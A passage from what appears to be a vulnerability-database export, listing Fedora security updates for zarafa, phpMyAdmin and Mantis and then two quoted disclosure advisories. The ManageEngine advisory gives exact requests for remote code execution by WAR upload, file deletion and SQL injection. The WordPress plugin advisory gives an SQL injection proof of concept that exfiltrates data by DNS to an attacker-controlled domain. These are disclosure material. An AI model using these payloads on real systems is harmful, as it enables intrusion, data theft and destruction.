", "cvss3": {}, "published": "2014-08-30T03:55:03", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: zarafa-7.1.10-4.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5447", "CVE-2014-5448", "CVE-2014-5449"], "modified": "2014-08-30T03:55:03", "id": "FEDORA:66760238CC", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/EP5ZMTAM36HIE4QCXG3URL7CDMR4TWMO/", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:52", "description": "The Zarafa Collaboration Platform is a Microsoft Exchange replacement. The Open Source Collaboration provides an integration with your existing Linux mail server, native mobile phone support by ActiveSync compatibility and a webaccess with 'Look & Feel' similar to Outlook using Ajax. Including an IMAP and a POP3 gateway as well as an iCal/CalDAV gateway, the Zarafa Open Source Collaboration can combine the usability with the stability and the flexibility of a Linux server. The proven Zarafa groupware solution is using MAPI objects, provides a MAPI client library as well as programming interfaces for C++, PHP and Python. The other Zarafa related packages need to be installed to gain all features and benefits of the Zarafa Collaboration Platform (ZCP). 
", "cvss3": {}, "published": "2014-09-02T06:45:25", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: zarafa-7.1.10-4.fc19", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5447", "CVE-2014-5448", "CVE-2014-5449"], "modified": "2014-09-02T06:45:25", "id": "FEDORA:614A323504", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/2QNALKONU4O6C43BBUU74ZKEE7BMGQM7/", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-06-08T18:43:52", "description": "phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the World Wide Web. Most frequently used operations are supported by the user interface (managing databases, tables, fields, relations, indexes, users, permissions), while you still have the ability to directly execute any SQL statement. 
Features include an intuitive web interface, support for most MySQL features (browse and drop databases, tables, views, fields and indexes, create, copy, drop, rename and alter databases, tables, fields and indexes, maintenance server, databases and tables, with proposals on server configuration, execute, edit and bookmark any SQL-statement, even batch-queries, manage MySQL users and privileges, manage stored procedures and triggers), import data from CSV and SQL, export data to various formats: CSV, SQL, XML, PDF, OpenDocument Text and Spreadsheet, Word, Excel, LATEX and others, administering multiple servers, creating PDF graphics of your database layout, creating complex queries using Query-by-example (QBE), searching globally in a database or a subset of it, transforming stored data into any format using a set of predefined functions, like displaying BLOB-data as image or download-link and much more... ", "cvss3": {}, "published": "2014-08-28T15:35:08", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: phpMyAdmin-4.2.7.1-1.fc19", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5273", "CVE-2014-5274"], "modified": "2014-08-28T15:35:08", "id": "FEDORA:1F3CA239E0", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/K666AQ7U2PTC4MOGZSNEM5NE7HIBHI4L/", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-06-08T18:43:52", "description": "phpMyAdmin is a tool written in PHP intended to handle the administration 
of MySQL over the World Wide Web. Most frequently used operations are supported by the user interface (managing databases, tables, fields, relations, indexes, users, permissions), while you still have the ability to directly execute any SQL statement. Features include an intuitive web interface, support for most MySQL features (browse and drop databases, tables, views, fields and indexes, create, copy, drop, rename and alter databases, tables, fields and indexes, maintenance server, databases and tables, with proposals on server configuration, execute, edit and bookmark any SQL-statement, even batch-queries, manage MySQL users and privileges, manage stored procedures and triggers), import data from CSV and SQL, export data to various formats: CSV, SQL, XML, PDF, OpenDocument Text and Spreadsheet, Word, Excel, LATEX and others, administering multiple servers, creating PDF graphics of your database layout, creating complex queries using Query-by-example (QBE), searching globally in a database or a subset of it, transforming stored data into any format using a set of predefined functions, like displaying BLOB-data as image or download-link and much more... 
", "cvss3": {}, "published": "2014-08-24T02:55:48", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: phpMyAdmin-4.2.7.1-1.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5273", "CVE-2014-5274"], "modified": "2014-08-24T02:55:48", "id": "FEDORA:BB5EF22D81", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/QGXDY5AULXTSBSVPNQWHIF47ZXXJ2Y5J/", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:52", "description": "Mantis is a free popular web-based issue tracking system. It is written in the PHP scripting language and works with MySQL, MS SQL, and PostgreSQL databases and a web server. Almost any web browser should be able to function as a client. 
Documentation can be found in: /usr/share/doc/mantis When the package has finished installing, you will need to perform some additional configuration steps; these are described in: /usr/share/doc/mantis/README.Fedora ", "cvss3": {}, "published": "2014-03-13T05:07:18", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: mantis-1.2.17-1.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1608", "CVE-2014-1609", "CVE-2014-2238"], "modified": "2014-03-13T05:07:18", "id": "FEDORA:69D4020E0D", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/JR23HGSGT4TZ4VAF37BJUV4TIYD5737S/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-06-08T18:43:52", "description": "phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the World Wide Web. Most frequently used operations are supported by the user interface (managing databases, tables, fields, relations, indexes, users, permissions), while you still have the ability to directly execute any SQL statement. 
Features include an intuitive web interface, support for most MySQL features (browse and drop databases, tables, views, fields and indexes, create, copy, drop, rename and alter databases, tables, fields and indexes, maintenance server, databases and tables, with proposals on server configuration, execute, edit and bookmark any SQL-statement, even batch-queries, manage MySQL users and privileges, manage stored procedures and triggers), import data from CSV and SQL, export data to various formats: CSV, SQL, XML, PDF, OpenDocument Text and Spreadsheet, Word, Excel, LATEX and others, administering multiple servers, creating PDF graphics of your database layout, creating complex queries using Query-by-example (QBE), searching globally in a database or a subset of it, transforming stored data into any format using a set of predefined functions, like displaying BLOB-data as image or download-link and much more... ", "cvss3": {}, "published": "2014-09-23T04:32:06", "type": "fedora", "title": "[SECURITY] Fedora 21 Update: phpMyAdmin-4.2.8.1-2.fc21", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6300"], "modified": "2014-09-23T04:32:06", "id": "FEDORA:04AEA22A8A", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/K4RF6EKNKZ2LO37TQKVLRROXCLFHBJG2/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-06-08T18:43:52", "description": "phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over 
the World Wide Web. Most frequently used operations are supported by the user interface (managing databases, tables, fields, relations, indexes, users, permissions), while you still have the ability to directly execute any SQL statement. Features include an intuitive web interface, support for most MySQL features (browse and drop databases, tables, views, fields and indexes, create, copy, drop, rename and alter databases, tables, fields and indexes, maintenance server, databases and tables, with proposals on server configuration, execute, edit and bookmark any SQL-statement, even batch-queries, manage MySQL users and privileges, manage stored procedures and triggers), import data from CSV and SQL, export data to various formats: CSV, SQL, XML, PDF, OpenDocument Text and Spreadsheet, Word, Excel, LATEX and others, administering multiple servers, creating PDF graphics of your database layout, creating complex queries using Query-by-example (QBE), searching globally in a database or a subset of it, transforming stored data into any format using a set of predefined functions, like displaying BLOB-data as image or download-link and much more... 
", "cvss3": {}, "published": "2014-09-25T10:40:40", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: phpMyAdmin-4.2.8.1-2.fc19", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6300"], "modified": "2014-09-25T10:40:40", "id": "FEDORA:F19B522529", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/G55WSHGPZDZ5KKRYXPYNWQWZCYYFMNSC/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-06-08T18:43:52", "description": "phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the World Wide Web. Most frequently used operations are supported by the user interface (managing databases, tables, fields, relations, indexes, users, permissions), while you still have the ability to directly execute any SQL statement. 
Features include an intuitive web interface, support for most MySQL features (browse and drop databases, tables, views, fields and indexes, create, copy, drop, rename and alter databases, tables, fields and indexes, maintenance server, databases and tables, with proposals on server configuration, execute, edit and bookmark any SQL-statement, even batch-queries, manage MySQL users and privileges, manage stored procedures and triggers), import data from CSV and SQL, export data to various formats: CSV, SQL, XML, PDF, OpenDocument Text and Spreadsheet, Word, Excel, LATEX and others, administering multiple servers, creating PDF graphics of your database layout, creating complex queries using Query-by-example (QBE), searching globally in a database or a subset of it, transforming stored data into any format using a set of predefined functions, like displaying BLOB-data as image or download-link and much more... ", "cvss3": {}, "published": "2014-09-25T10:43:07", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: phpMyAdmin-4.2.8.1-2.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6300"], "modified": "2014-09-25T10:43:07", "id": "FEDORA:02C52225B7", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/U6WA3XCMLGSRPK226SBKLKRYVHMVUBGN/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-06-08T18:43:52", "description": "phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over 
the World Wide Web. Most frequently used operations are supported by the user interface (managing databases, tables, fields, relations, indexes, users, permissions), while you still have the ability to directly execute any SQL statement. Features include an intuitive web interface, support for most MySQL features (browse and drop databases, tables, views, fields and indexes, create, copy, drop, rename and alter databases, tables, fields and indexes, maintenance server, databases and tables, with proposals on server configuration, execute, edit and bookmark any SQL-statement, even batch-queries, manage MySQL users and privileges, manage stored procedures and triggers), import data from CSV and SQL, export data to various formats: CSV, SQL, XML, PDF, OpenDocument Text and Spreadsheet, Word, Excel, LATEX and others, administering multiple servers, creating PDF graphics of your database layout, creating complex queries using Query-by-example (QBE), searching globally in a database or a subset of it, transforming stored data into any format using a set of predefined functions, like displaying BLOB-data as image or download-link and much more... 
", "cvss3": {}, "published": "2014-10-05T08:14:21", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: phpMyAdmin-4.2.9.1-1.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7217"], "modified": "2014-10-05T08:14:21", "id": "FEDORA:BD7C421498", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/XTHGVIHNRMZTG5W7VU7GOJTBR6DUGYXF/", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-06-08T18:43:52", "description": "phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the World Wide Web. Most frequently used operations are supported by the user interface (managing databases, tables, fields, relations, indexes, users, permissions), while you still have the ability to directly execute any SQL statement. 
Features include an intuitive web interface, support for most MySQL features (browse and drop databases, tables, views, fields and indexes, create, copy, drop, rename and alter databases, tables, fields and indexes, maintenance server, databases and tables, with proposals on server configuration, execute, edit and bookmark any SQL-statement, even batch-queries, manage MySQL users and privileges, manage stored procedures and triggers), import data from CSV and SQL, export data to various formats: CSV, SQL, XML, PDF, OpenDocument Text and Spreadsheet, Word, Excel, LATEX and others, administering multiple servers, creating PDF graphics of your database layout, creating complex queries using Query-by-example (QBE), searching globally in a database or a subset of it, transforming stored data into any format using a set of predefined functions, like displaying BLOB-data as image or download-link and much more... ", "cvss3": {}, "published": "2014-10-08T19:06:12", "type": "fedora", "title": "[SECURITY] Fedora 21 Update: phpMyAdmin-4.2.9.1-1.fc21", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7217"], "modified": "2014-10-08T19:06:12", "id": "FEDORA:F358E22606", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/BPAZTXN4K34MI53DVT74L6UTHNNE6CIH/", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-06-08T18:43:52", "description": "phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over 
the World Wide Web. Most frequently used operations are supported by the user interface (managing databases, tables, fields, relations, indexes, users, permissions), while you still have the ability to directly execute any SQL statement. Features include an intuitive web interface, support for most MySQL features (browse and drop databases, tables, views, fields and indexes, create, copy, drop, rename and alter databases, tables, fields and indexes, maintenance server, databases and tables, with proposals on server configuration, execute, edit and bookmark any SQL-statement, even batch-queries, manage MySQL users and privileges, manage stored procedures and triggers), import data from CSV and SQL, export data to various formats: CSV, SQL, XML, PDF, OpenDocument Text and Spreadsheet, Word, Excel, LATEX and others, administering multiple servers, creating PDF graphics of your database layout, creating complex queries using Query-by-example (QBE), searching globally in a database or a subset of it, transforming stored data into any format using a set of predefined functions, like displaying BLOB-data as image or download-link and much more... 
", "cvss3": {}, "published": "2014-10-11T06:52:59", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: phpMyAdmin-4.2.9.1-1.fc19", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7217"], "modified": "2014-10-11T06:52:59", "id": "FEDORA:7C03E60CF28A", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/Y23ELHUKCRQBQFKM6TBL5TSMFULT6HL4/", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:30", "description": "\nManageEngine OpManager Social IT Plus IT360 - Multiple Vulnerabilities", "edition": 2, "cvss3": {}, "published": "2014-11-09T00:00:00", "title": "ManageEngine OpManager Social IT Plus IT360 - Multiple Vulnerabilities", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6035", "CVE-2014-6034", "CVE-2014-7866", "CVE-2014-7868", "CVE-2014-6036"], "modified": "2014-11-09T00:00:00", "id": "EXPLOITPACK:C6C0E52E4741BC06145EA77E364C27BF", "href": "", "sourceData": ">> Multiple vulnerabilities in 
ManageEngine OpManager, Social IT Plus and IT360\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\n==========================================================================\nDisclosure: 27/09/2014 (#1 and #2), 09/11/2014 (#3 and #4) / Last updated: 09/11/2014\n\n>> Background on the affected products:\n\"ManageEngine OpManager is a network and data center infrastructure management software that helps large enterprises, service providers and SMEs manage their data centers and IT infrastructure efficiently and cost effectively. Automated workflows, intelligent alerting engines, configurable discovery rules, and extendable templates enable IT teams to setup a 24x7 monitoring system within hours of installation.\"\n\n\"Social IT Plus offers a cascading wall that helps IT folks to start discussions, share articles and videos easily and quickly. Other team members can access it and post comments and likes on the fly.\"\n\n\"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration.\"\n\n\n>> Technical details:\n#1\nVulnerability: Remote code execution via WAR file upload\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\n\na)\nCVE-2014-6034\nPOST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war\n<... WAR file payload ...>\nAffected versions: OpManager v8.8 to v11.4; Social IT Plus v11.0; IT360 v? 
to v10.4\nA Metasploit module that exploits this vulnerability has been released.\n\nb)\nCVE-2014-6035\nPOST /servlets/FileCollector?AGENTKEY=123&FILENAME=../../../tomcat/webapps/warfile.war\n<... WAR file payload ...>\n\nAffected versions: OpManager v? to v11.4\n\n\n#2\nVulnerability: Arbitrary file deletion\nCVE-2014-6036\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\nAffected versions: OpManager v? to v11.4; Social IT Plus v11.0; IT360 v? to v10.3/10.4\n\nPOST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini\n\n\n#3\nVulnerability: Remote code execution via file upload\nCVE-2014-7866\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\n\na)\nPOST /servlet/MigrateLEEData?fileName=../tomcat/webapps/warfile.war%00\n<... WAR file payload ...>\n\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0\n\nb)\nPOST /servlet/MigrateCentralData?operation=downloadFileFromProbe&zipFileName=../tomcat/webapps/warfile.war%00\n<... 
WAR file payload ...>\n\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0\n\n\n#4\nVulnerability: Blind SQL injection\nCVE-2014-7868\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\n\na)\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=[SQLi]\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=aaa'%3bcreate+table+pulicia+(bolas+text)%3b--+\nAffected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\n\nb)\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=[SQLi] --> runs direct query in db!\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=create+table+panicia+(bolos+text)\nAffected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\n\n\n>> Fix:\nUpgrade to OpManager 11.3 or 11.4, then install patches [A], [B] and [C].\nThis patch can be applied to all the applications but only for the latest version of each (OpManager 11.3/11.4, Social IT 11.0, IT360 10.4).\nThe fix will be included in OpManager version 11.5 which should be released sometime in late November or December 2014. 
No indication was given for when fixed versions of IT360 and Social IT Plus will be released.\n\n[A] https://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix\nResolves #1 and #2\n\n[B] https://support.zoho.com/portal/manageengine/helpcenter/articles/sql-injection-vulnerability-fix\nResolves #3\n\n[C] https://support.zoho.com/portal/manageengine/helpcenter/articles/fix-for-remote-code-execution-via-file-upload-vulnerability\nResolves #4\n\n================\nAgile Information Security Limited\nhttp://www.agileinfosec.co.uk/\n>> Enabling secure digital business >>", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:05:05", "description": "\nWordPress Plugin All In One WP Security 3.8.2 - SQL Injection", "edition": 2, "published": "2014-09-25T00:00:00", "title": "WordPress Plugin All In One WP Security 3.8.2 - SQL Injection", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6242"], "modified": "2014-09-25T00:00:00", "id": "EXPLOITPACK:21A82635D94869A46B5D9E35EAC465C9", "href": "", "sourceData": "Advisory ID: HTB23231\nProduct: All In One WP Security WordPress plugin\nVendor: Tips and Tricks HQ, Peter, Ruhul, Ivy \nVulnerable Version(s): 3.8.2 and probably prior\nTested Version: 3.8.2\nAdvisory Publication: September 3, 2014 [without technical details]\nVendor Notification: September 3, 2014 \nVendor Patch: September 12, 2014 \nPublic Disclosure: September 24, 2014 \nVulnerability Type: SQL 
Injection [CWE-89]\nCVE Reference: CVE-2014-6242\nRisk Level: Medium \nCVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)\nSolution Status: Fixed by Vendor\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n\n-----------------------------------------------------------------------------------------------\n\nAdvisory Details:\n\nHigh-Tech Bridge Security Research Lab discovered two SQL injection vulnerabilities in All In One WP Security WordPress plugin, which can be exploited to perform SQL Injection attacks. Both vulnerabilities require administrative privileges, however can be also exploited by non-authenticated attacker via CSRF vector. \n\n\n1) SQL Injection in All In One WP Security WordPress plugin: CVE-2014-6242\n\n1.1 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the \"orderby\" HTTP GET parameters to \"/wp-admin/admin.php\" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\n\nThe PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the \"orderby\" parameter if the database of the vulnerable application is hosted on a Windows system. 
The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) sub-domain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\n\nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\n\nThis vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit a web page with an CSRF exploit, e.g.:\n\nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&order=,%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\n\n\n1.2 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the \"order\" HTTP GET parameters to \"/wp-admin/admin.php\" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\n\nThe PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the \"order\" parameter if the database of the vulnerable application is hosted on a Windows system. 
